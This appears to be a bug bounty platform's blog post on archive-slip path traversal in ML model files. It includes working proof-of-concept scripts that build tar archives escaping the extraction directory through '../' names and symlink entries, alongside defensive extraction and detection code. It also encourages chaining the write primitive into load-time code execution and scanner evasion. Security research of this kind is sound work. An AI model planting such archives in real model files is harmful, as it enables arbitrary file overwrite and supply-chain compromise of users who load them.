Many ML model files (.nemo, .keras, .gguf, even trusty .pth) are just zip/tar archives in disguise. Feed one to a loader that blindly calls extractall() and pow, you’ve opened the door to an archive-slip (Zip Slip, TarSlip) directory-traversal bug.
Although huntr’s scanner now grabs the easy catches—the classic ../../etc/passwd or stray symlink—a smart variation on the same primitive can still score a bounty.
So why talk about archive slip at all? Because it’s still the easiest first hop toward higher-value goals, like arbitrary code execution (ACE) at load time. Below we recap two real model file vulnerabilities (MFVs) that relied on TarSlip and then show where today’s payouts really are.
The Vulnerability Explained
When code unpacks an archive without validating each member’s final write path, attackers can:
- Path-traverse with ../ sequences or absolute paths.
- Abuse symlinks so an innocent-looking folder entry actually points outside the sandbox.
Model formats—.nemo, .keras, .pth, even many .onnx bundles—are just tar/zip files under a fancy extension. One-liner APIs (model.from_pretrained()) hide the extraction step, so sloppy extraction slips in unnoticed.
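To make "validating each member’s final write path" concrete, here is a minimal defensive sketch. It assumes a POSIX filesystem and a loader that only needs plain files and directories; the names safe_extract and UnsafeArchiveError are hypothetical and not taken from any framework.

```python
import os
import shutil
import tarfile


class UnsafeArchiveError(Exception):
    """Raised when an archive member must not be written to disk."""


def safe_extract(archive_path, dest_dir):
    """Extract a tar archive, refusing links and members that escape dest_dir."""
    os.makedirs(dest_dir, exist_ok=True)
    dest_root = os.path.realpath(dest_dir)
    with tarfile.open(archive_path) as tf:
        members = tf.getmembers()
        # Pass 1: validate every member before anything touches the disk.
        for member in members:
            # Links can redirect later writes, so this sketch refuses them outright.
            if member.issym() or member.islnk():
                raise UnsafeArchiveError(f"link entry not allowed: {member.name}")
            # Accept only regular files and directories (no devices or FIFOs).
            if not (member.isfile() or member.isdir()):
                raise UnsafeArchiveError(f"unsupported entry type: {member.name}")
            # Resolve the final write path and confirm it stays under dest_root.
            target = os.path.realpath(os.path.join(dest_root, member.name))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise UnsafeArchiveError(f"path escapes target dir: {member.name}")
        # Pass 2: write the validated members by hand instead of calling extractall().
        for member in members:
            target = os.path.join(dest_root, member.name)
            if member.isdir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with tf.extractfile(member) as src, open(target, "wb") as dst:
                    shutil.copyfileobj(src, dst)
```

Validating the whole archive before writing anything means a malicious member late in the archive cannot leave a half-extracted model behind. Rejecting links entirely is stricter than some formats may tolerate, so treat that as a design choice of this sketch rather than a requirement.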
Two Classic PoCs
(Framework names redacted; focus on the pattern.)
Path-Traversal Demo
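    import tarfile

    def escape(member):
        # Rewrite the stored name so extraction breaks out of the extract dir.
        member.name = "../../tmp/hacked"
        return member

    # harmless.txt must exist locally; only its name inside the archive is malicious.
    with tarfile.open("traversal_demo.model", "w:gz") as tf:
        tf.add("harmless.txt", filter=escape)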
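Any loader that does a raw extractall() with no extraction filter will write the file two directories above its extraction directory, which is /tmp/hacked when that directory sits two levels below the filesystem root.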
Symlink Demo (beats naive path filters)
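    import pathlib
    import tarfile

    TARGET = "/tmp"         # where the payload will land
    PAYLOAD = "abc/hacked"  # must exist locally as a file inside directory abc/

    def link_it(member):
        # Turn the directory entry into a symlink that points at TARGET.
        member.type, member.linkname = tarfile.SYMTYPE, TARGET
        return member

    with tarfile.open("symlink_demo.model", "w:gz") as tf:
        # First entry: "abc" stored as a symlink to /tmp instead of a directory.
        tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
        # Second entry: "abc/hacked" rides the symlink and lands in /tmp.
        tf.add(PAYLOAD)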
Even loaders that strip ../ often forget to block symlink entries.
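The symlink trick is easy to miss because the payload’s own name ("abc/hacked") looks harmless. As a rough illustration of what a check has to look at, the sketch below flags any member whose path passes through a link declared earlier in the same archive. The function name find_link_riders is hypothetical, and the check is deliberately narrow: it does not cover traversal sequences or links that already exist on disk.

```python
import posixpath
import tarfile


def find_link_riders(archive_path):
    """Return (member_name, link_name) pairs where a member sits beneath a link entry."""
    link_names = set()
    riders = []
    with tarfile.open(archive_path) as tf:
        for member in tf:
            # Normalise "./abc" and trailing slashes so prefixes compare cleanly.
            name = posixpath.normpath(member.name).lstrip("/")
            parts = name.split("/")
            # Compare every proper prefix of this path with the links seen so far.
            for i in range(1, len(parts)):
                prefix = "/".join(parts[:i])
                if prefix in link_names:
                    riders.append((member.name, prefix))
                    break
            # Remember symlinks and hardlinks so later members can be matched.
            if member.issym() or member.islnk():
                link_names.add(name)
    return riders
```

Run against an archive built like the symlink demo, this should report the payload entry together with the link it rides; an archive with no link entries yields an empty list.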
Why Archive Slip Still Matters
- Write-anywhere is a perfect pivot to overwrite config files or plant second-stage payloads.
- DIY loaders are everywhere in research repos; they use extractall() or extract() behind the scenes.
- Supply-chain impact: one poisoned model hub entry can compromise countless CI pipelines.
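For the DIY loaders mentioned above, recent Python releases ship extraction filters in tarfile itself (added in 3.12 and backported to security releases of older branches). The sketch below is one way a loader could opt in; the wrapper name extract_untrusted is hypothetical, and refusing to run on interpreters that lack the feature is an assumption of this example, not a rule from any framework.

```python
import tarfile


def extract_untrusted(archive_path, dest_dir):
    """Extract with tarfile's built-in "data" filter, or refuse if it is missing."""
    # The tarfile docs suggest this hasattr() check to detect filter support.
    if not hasattr(tarfile, "data_filter"):
        raise RuntimeError("tarfile extraction filters unavailable; upgrade Python")
    with tarfile.open(archive_path) as tf:
        # The "data" filter rejects members and links that resolve outside dest_dir,
        # and refuses special files such as devices.
        tf.extractall(dest_dir, filter="data")
```

On a filter-aware interpreter, the traversal and symlink demos should fail with a tarfile.FilterError subclass instead of writing outside the destination. That is exactly why bounty-worthy findings now tend to need something beyond the classic payloads.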
Where the Bounty Money Really Is
| High Value | Medium → Low |
| --- | --- |
| ✔ Code execution at load time via header/metadata abuse | ✔ Zip/TarSlip traversal |
| ✔ Backdoors or output manipulation | ✔ Bugs that fire only after extra imports |
| ✔ Tricks that evade our scanners (nested, encrypted, obfuscated) | ✔ DoS via oversized tensors |
Current reward tiers are posted on the bounties page; bigger impact + high-value format = bigger payout.
Wrapping Up
Archive-slip by itself is basically dead for bounty purposes—but it’s still the quickest way to get a write-anywhere primitive. Chain that primitive into load-time code execution, model-file backdoors & output tampering, or scanner evasion, and you’re solidly in high-value MFV territory.
Focus on extraction and deserialization paths, especially in high-value formats like .safetensors, .gguf, .keras, and .joblib. Show us something the scanner can’t see, and the bounty is yours.
Think you’ve got one? Submit your MFV—and happy hunting! 🤘